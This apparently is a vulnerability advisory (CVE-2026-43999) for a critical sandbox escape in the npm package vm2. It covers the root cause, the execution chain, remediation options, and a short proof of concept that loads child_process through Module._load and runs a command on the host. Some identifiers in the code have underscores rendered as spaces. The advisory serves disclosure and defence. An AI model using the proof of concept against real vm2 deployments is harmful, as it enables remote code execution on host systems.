PT-2026-38390 · Npm · Vm2
Root Cause: The
Inconsistent defense: some builtins are isolated,
Option 1: Exclude
Option 2: Add
Published
2026-05-07
·
Updated
2026-05-07
·
CVE-2026-43999
CVSS v3.1
9.9
Critical
| Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Summary
NodeVM's
builtin allowlist can be bypassed when the module builtin is allowed (including via the '*' wildcard). The module builtin exposes Node's Module. load(), which loads any module by name directly in the host context, completely bypassing vm2's builtin restriction. This allows sandboxed code to load excluded builtins like child process and achieve remote code execution.Severity
Critical (CVSS 3.1: 9.9)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H- Attack Vector: Network — sandboxed code is typically received from external sources (user-submitted scripts, plugin code)
- Attack Complexity: Low — no special conditions required;
['*', '-child process']is a common, documented pattern - Privileges Required: Low — attacker needs only the ability to submit code to the sandbox, which is the intended use case
- User Interaction: None
- Scope: Changed — escape from sandbox boundary to host system
- Confidentiality Impact: High — arbitrary command execution on the host
- Integrity Impact: High — arbitrary command execution on the host
- Availability Impact: High — arbitrary command execution on the host
Affected Component
lib/builtin.js—makeBuiltinsFromLegacyOptions()(lines 109-117) — includesmodulein'*'expansionlib/builtin.js—addDefaultBuiltin()(lines 86-90) — loadsmodulewith generic readonly wrapperlib/builtin.js—SPECIAL MODULES(line 61) — does NOT includemodule
CWE
- CWE-863: Incorrect Authorization
Description
Root Cause: The module builtin provides unrestricted host module loading
When
builtin: ['*', '-child process'] is configured, makeBuiltinsFromLegacyOptions iterates over BUILTIN MODULES and adds all modules not explicitly excluded:// lib/builtin.js:40
const BUILTIN MODULES = (nmod.builtinModules || Object.getOwnPropertyNames(process.binding('natives')))
.filter(s=>!s.startsWith('internal/'));
// lib/builtin.js:109-117
if (Array.isArray(builtins)) {
const def = builtins.indexOf('*') >= 0;
if (def) {
for (let i = 0; i < BUILTIN MODULES.length; i++) {
const name = BUILTIN MODULES[i];
if (builtins.indexOf(`-${name}`) === -1) {
addDefaultBuiltin(res, name, hostRequire);
}
}
}
Node's
builtinModules includes 'module' (verified: require('module').builtinModules.includes('module') → true). Since only '-child process' is excluded, 'module' passes the filter and gets added.The
module builtin is NOT in SPECIAL MODULES (which only covers events, buffer, util), so it gets the generic loader:// lib/builtin.js:86-90
function addDefaultBuiltin(builtins, key, hostRequire) {
if (builtins.has(key)) return;
const special = SPECIAL MODULES[key];
builtins.set(key, special ? special : vm => vm.readonly(hostRequire(key)));
}
This wraps Node's
Module class in a readonly proxy and hands it to the sandbox.The readonly proxy does not prevent method calls
ReadOnlyHandler (bridge.js:940-983) only overrides mutation traps: set, setPrototypeOf, defineProperty, deleteProperty, isExtensible, preventExtensions. It does NOT override get or apply, which are inherited from BaseHandler.BaseHandler.apply() (bridge.js:665-677) forwards function calls directly to the host context:apply(target, context, args) {
const object = getHandlerObject(this);
let ret;
try {
context = otherFromThis(context);
args = otherFromThisArguments(args);
ret = otherReflectApply(object, context, args);
} catch (e) {
throw thisFromOtherForThrow(e);
}
return thisFromOther(ret);
}
So
Module. load('child process') is forwarded to Node's native Module. load in the host context, which loads child process without any vm2 allowlist check.Inconsistent defense: some builtins are isolated, module is not
The codebase IS aware that certain builtins need special handling:
events: Gets a complete sandbox-native reimplementation vialib/events.jsbuffer: Custom loader that only exposes theBufferclassutil: Custom loader that replacesinheritswith a sandbox-safe version
But
module — which provides access to the host's entire module loading infrastructure via Module. load, Module. resolveFilename, etc. — gets no special treatment at all.Full execution chain
- Host configures
NodeVMwithbuiltin: ['*', '-child process'] makeBuiltinsFromLegacyOptionsadds'module'to allowed builtins (not excluded)- Sandbox code calls
require('module')→ resolver finds'module'in builtins →loadBuiltinModule('module') - Loader calls
vm.readonly(hostRequire('module'))→ returns readonly proxy of Node'sModuleclass - Sandbox reads
Module. load→BaseHandler.get()returns proxied function - Sandbox calls
Module. load('child process')→BaseHandler.apply()forwards to host - Host's
Module. loadloadschild processnatively (no vm2 check involved) child processmodule proxied back to sandbox- Sandbox calls
child process.execSync('id')→ executes on host → RCE
Proof of Concept
const { NodeVM } = require('vm2');
// Developer thinks child process is blocked
const vm = new NodeVM({
require: {
builtin: ['*', '-child process'],
external: false,
},
});
const out = vm.run(`
const Module = require('module');
// Module. load bypasses vm2's builtin allowlist entirely
const cp = Module. load('child process');
module.exports = cp.execSync('id').toString();
`, 'poc.js');
console.log(out.trim()); // prints host uid/gid — RCE achieved
Impact
- Complete builtin allowlist bypass: Any configuration that allows the
modulebuiltin (including['*', '-X']patterns) can load ANY builtin, including explicitly excluded ones. - Remote code execution: Sandboxed code can execute arbitrary commands on the host via
child process.execSync. - Common configuration affected: The
['*', '-child process', '-fs']pattern is documented and widely used by developers who want "all builtins except dangerous ones." - No special conditions: Unlike environment-dependent attacks, this works on every Node.js version, every OS, and every vm2 deployment that uses the
'*'wildcard. - Additional attack surfaces via
module: Beyondload, theModuleclass also exposesresolveFilename,cache,pathCache, and other internals that could be abused.
Recommended Remediation
Option 1: Exclude module from BUILTIN MODULES entirely (Preferred)
The
module builtin provides unrestricted host module loading and should never be exposed to the sandbox:// lib/builtin.js:40
const DANGEROUS BUILTINS = new Set(['module', 'worker threads', 'cluster']);
const BUILTIN MODULES = (nmod.builtinModules || Object.getOwnPropertyNames(process.binding('natives')))
.filter(s => !s.startsWith('internal/') && !DANGEROUS BUILTINS.has(s));
This prevents
module from being included even with the '*' wildcard. Consider also blocking worker threads and cluster which can spawn processes.Option 2: Add module to SPECIAL MODULES with a safe wrapper
If
module must be accessible, provide a sandbox-safe version that only exposes safe APIs:// lib/builtin.js
const SPECIAL MODULES = {
events: { /* ... existing ... */ },
buffer: defaultBuiltinLoaderBuffer,
util: defaultBuiltinLoaderUtil,
module: function defaultBuiltinLoaderModule(vm) {
// Only expose safe, read-only metadata — no load, no resolveFilename
return vm.readonly({
builtinModules: [...nmod.builtinModules],
// Omit load, resolveFilename, cache, createRequire, etc.
});
}
};
Tradeoff: Breaks sandbox code that legitimately uses
Module APIs, but those APIs are inherently unsafe in a sandbox context.Credit
This vulnerability was discovered and reported by bugbunny.ai.
Fix
Incorrect Authorization
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Vm2